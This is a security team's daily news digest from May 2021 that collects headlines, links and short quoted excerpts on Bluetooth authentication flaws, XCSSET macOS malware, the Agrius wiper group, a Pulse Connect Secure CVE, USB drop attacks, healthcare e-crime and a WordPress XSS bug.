OSN May 25, 2021

Fortify Security Team
May 25, 2021

Title: New Bluetooth Flaws Let Attackers Impersonate Legitimate Devices

Date Published: May 24, 2021

https://thehackernews.com/2021/05/new-bluetooth-flaws-let-attackers.html

Excerpt: “Our attacks work even when the victims are using Bluetooth’s strongest security modes, e.g., SSP and Secure Connections. Our attacks target the standardized Bluetooth authentication procedure, and are therefore effective against any standard compliant Bluetooth device,” the researchers said.The Android Open Source Project (AOSP), Cisco, Cradlepoint, Intel, Microchip Technology, and Red Hat are among the identified vendors with products impacted by these security flaws. AOSP, Cisco, and Microchip Technology said they are currently working to mitigate the issues.”

Title: Apple Fixes MacOS Vulnerability Exploited by XCSSET Malware

Date Published: May 25, 2021

https://heimdalsecurity.com/blog/apple-fixes-macos-vulnerability-exploited-by-xcsset-malware/

Excerpt: “This threat primarily spreads via Xcode projects and maliciously modified applications created from the malware. It is not yet clear how the threat initially enters these systems. Presumably, these systems would be primarily used by developers. These Xcode projects have been modified such that upon building, these projects would run a malicious code. This eventually leads to the main XCSSET malware being dropped and run on the affected system. Infected users are also vulnerable to having their credentials, accounts, and other vital data stolen.”

Title: Iranian Hacking Group Agrius Pretends to Encrypt Files for a Ransom, Destroys Them Instead

Date Published: May 25, 2021

https://www.zdnet.com/article/iranian-hacking-group-agrius-pretends-to-encrypt-files-for-a-ransom-destroys-it-instead/

Excerpt: “The group uses a combination of its own custom toolsets and readily available offensive security software to deploy either a destructive wiper or a custom wiper-turned-ransomware variant.   However, unlike ransomware groups such as Maze and Conti, it doesn’t appear that Agrius is purely motivated by money — instead, the use of ransomware is a new addition and a bolt-on to attacks focused on cyberespionage and destruction.”

Title: New High-Severity Vulnerability Reported in Pulse Connect Secure VPN

Date Published: May 25, 2021

https://thehackernews.com/2021/05/new-high-severity-vulnerability.html

Excerpt: “The flaw, identified as CVE-2021-22908, has a CVSS score of 8.5 out of a maximum of 10 and impacts Pulse Connect Secure versions 9.0Rx and 9.1Rx. In a report detailing the vulnerability, the CERT Coordination Center said the issue stems from the gateway’s ability to connect to Windows file shares through a number of CGI endpoints that could be leveraged to carry out the attack.”

Title: USB Drop Attack

Date Published: May 25, 2021

https://sliitcs2.medium.com/usb-drop-attack-d8dcb8ce2e4a

Excerpt: “This attack is so successful because it takes advantage of humans’ inherent curiosity and/or ability to support others. When there is a device lying around with possibly “juicy” details on it, humans can’t help but grab it to see what’s inside. A successful intruder takes advantage of a victim’s natural interest to convince them to take a USB gadget. When a gadget is taken, the contents are almost always going to be checked by the perpetrator. Attackers will have tempting files or file names within the device to capitalize on the human traits that drew them to the device in the first place.”

Title: The New Group Policies Coming to Windows 10 21h2

Date Published: May 24, 2021

https://www.bleepingcomputer.com/news/microsoft/the-new-group-policies-coming-to-windows-10-21h2/

Excerpt: “As Microsoft continues to develop the Windows 10 21H2 feature update, we can use the preview builds to get a glimpse of the upcoming features, changes, and new group policies coming to the operating system this fall. Microsoft just released Windows 10 21H1 last week, but it was not met with much fanfare as it is not a very exciting release. Windows 10 21H2, also known as the Sun Valley update, is poised to be a much more feature-rich version, with a new UI refresh, DNS-over-HTTPS support, a modern disk management tool, new settings, and more.”

Title: Victims Lose Millions to Healthcare Related E-Crime

Date Published: May 24, 2021

https://www.helpnetsecurity.com/2021/05/25/healthcare-related-ecrime/

Excerpt: “Tactics often include offers for fake insurance cards, health insurance marketplace assistance, stolen health information, or various other scams involving medications, supplements, weight loss products, or diversion/pill mill practices. Criminals usually target victims through spam email, online advertisements, links in forums or on social media, and fraudulent websites.”

Title: Long-Lasting Malware Bot Phorpiex Adapts and Has New Ways of Deployment

Date Published: May 24, 2021

https://heimdalsecurity.com/blog/bot-phorpiex-adapts-new-ways-of-deployment/

Excerpt: “Since recently, when it has been found out that Phorpiex has the capacity to disable Microsoft Defender, Microsoft specialists looked more closely into the botnet and found out that it is “modifying registry keys to disable firewall and antivirus popups or functionality, overriding proxy and browser settings, setting the loader and executables to run at startup, and adding these executables to the authorized application lists.”

Title: Should Paying Ransoms to Attackers Be Banned?

Date Published: May 24, 2021

https://www.bankinfosecurity.com/should-paying-ransoms-to-attackers-be-banned-a-16726

Excerpt: “CNA reported being victimized by a “cybersecurity attack” on March 23 that caused a network disruption and affected certain systems, including corporate email. The attack led the company to disconnect its systems, including taking down its website. CNA later confirmed it had been victimized by ransomware. But CNA has not confirmed it paid a ransom. The company did not immediately reply to a request for comment on the Bloomberg report.”

Title: Restaurant Reservation System Patches Easy-to-Exploit XSS Bug

Date Published: May 24, 2021

https://threatpost.com/reservation-system-easy-to-exploit-xss-bug/166414/

Excerpt: “An easy-to-exploit bug impacting the WordPress plugin ReDi Restaurant Reservation allows unauthenticated attackers to pilfer reservation data and customer personal identifiable information by simply submitting a malicious snippet of JavaScript code into the reservation comment field. The bug affects ReDi Restaurant Reservation versions prior to 21.0307, with a patched (v. 21.0426) version of the plugin available for download. The vulnerability (CVE-2021-24299) is a persistent cross-site scripting (XSS) bug. The flaw is not yet rated.”

Recent Posts

January 20, 2022

Title: New MoonBounce UEFI Malware Used by APT41 in Targeted Attacks Date Published: January 20, 2022 https://www.bleepingcomputer.com/news/security/new-moonbounce-uefi-malware-used-by-apt41-in-targeted-attacks/ Excerpt: "Security analysts have discovered and linked...

January 19, 2022

Title: Office 365 Phishing Attack Impersonates the US Department of Labor Date Published: January 19, 2022 https://www.bleepingcomputer.com/news/security/office-365-phishing-attack-impersonates-the-us-department-of-labor/ Excerpt: "A new phishing campaign...

January 18, 2022

Title: Europol Shuts Down VPN Service Used by Ransomware Groups Date Published: January 18, 2022 https://www.bleepingcomputer.com/news/security/europol-shuts-down-vpn-service-used-by-ransomware-groups/ Excerpt: "Law enforcement authorities from 10 countries took down...

January 14, 2022

Title: Android users can now disable 2G to block Stingray attacks Date Published: January 13, 2022 https://www.bleepingcomputer.com/news/security/android-users-can-now-disable-2g-to-block-stingray-attacks/ Excerpt: "Google has finally rolled out an option on Android...

November 23, 2021

Title: Over 4000 UK Retailers Compromised by Magecart Attacks Date Published: November 23, 2021 https://www.infosecurity-magazine.com/news/4000-uk-retailers-compromised/ Excerpt: “UK government security experts have been forced to notify over 4000 domestic online...

November 2, 2021

Title: Possible Cyber Attack Hits ‘Brain’ of N.L. Health-care System, Delaying Thousands of Appointments Date Published: November 1, 2021 cbc.ca/news/canada/newfoundland-labrador/health-services-it-outage-update-nov-1-1.6232426 Excerpt: "A cyberattack appears to be...

OSN November 1, 2021

Title: New 'Trojan Source' Technique Lets Hackers Hide Vulnerabilities in Source Code Date Published: November 1, 2021 https://thehackernews.com/2021/11/new-trojan-source-technique-lets.html Excerpt: "A novel class of vulnerabilities could be leveraged by threat...